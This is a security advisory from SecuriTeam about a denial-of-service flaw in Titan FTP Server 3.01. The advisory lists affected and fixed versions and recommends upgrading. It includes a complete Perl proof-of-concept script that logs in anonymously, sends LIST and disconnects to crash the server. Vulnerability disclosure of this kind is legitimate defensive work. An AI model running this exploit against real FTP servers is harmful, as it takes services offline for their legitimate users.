Titan FTP Server Aborted LIST DoS ---------------------------------------------------- Article reference: http://www.securiteam.com/windowsntfocus/5RP0215CUU.html SUMMARY A security vulnerability exists in South River Technologies' Titan FTP Server. An attacker issuing a LIST command and disconnecting before the LIST command had the time to connect, will cause the program to try and access an invalid socket. This will result in the FTP service's crash (and in turn, no longer being able to service any additional users). DETAILS Vulnerable Systems: * Titan FTP Server version 3.01 build 163 Immune Systems: * Titan FTP Server version 3.10 build 169 Solution: To solve this issue upgrade to the latest version (3.10 build 169 or newer). Exploit: #!/usr/bin/perl # Test for Titan FTP server security vulnerability # # Orkut users? Come join the SecuriTeam community # http://www.orkut.com/Community.aspx?cmm=44441 # use IO::Socket; $host = "192.168.1.243"; my @combination; $combination[0] = "LIST \r\n"; for (my $i = 0; $combination[$i] ; $i++) { print "Combination: $1\n"; $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "2112", ); unless ($remote) { die "cannot connect to ftp daemon on $host" } print "connected\n"; while (<$remote>) { print $_; if (/220 /) { last; } } $remote->autoflush(1); my $ftp = "USER anonymous\r\n"; print $remote $ftp; print $ftp; while (<$remote>) { print $_; if (/331 /) { last; } } $ftp = "PASS a\@b.com\r\n"; print $remote $ftp; print $ftp; while (<$remote>) { print $_; if (/230 /) { last; } } $ftp = $combination[$i]; print $remote $ftp; print $ftp; while (<$remote>) { print $_; if (/150 /) { last; } close $remote; } ADDITIONAL INFORMATION SecurITeam would like to thank STORM for finding this vulnerability. Regards, Aviram Jenik Beyond Security Ltd. http://www.BeyondSecurity.com http://www.SecuriTeam.com The First Integrated Network and Web Application Vulnerability Scanner: http://www.beyondsecurity.com/webscan-wp.pdf ==================== ==================== DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.